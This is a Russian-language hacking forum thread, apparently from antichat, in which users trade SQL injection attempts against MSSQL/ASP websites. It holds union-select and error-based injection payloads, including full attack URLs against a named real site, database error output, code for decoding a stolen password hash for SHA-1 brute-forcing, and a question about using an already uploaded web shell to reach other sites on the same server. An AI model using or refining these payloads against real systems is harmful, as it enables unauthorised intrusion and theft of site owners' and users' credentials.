поржал)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Spyder, mssql может быть удаленно расположенной бд

не подумал =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--

Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'

Operand type clash: ntext is incompatible with int

/news/index.asp, line 20

Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(


Предварительно подобрал количество полей.

Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :

Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17


Вот ещё ошибка при выборе из бд -

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.

/index.asp, line 50

Как преобразовать нормально?)

Вот тут ЛОгин --- ПАСС

Теоритечески можно узнать пароли ?

$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;

И нада брутить SHA-1 хэш

http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--

Хули не выходит ((

Это MSSQL!!!

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--

https://forum.antichat.ru/thread30501.html

Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?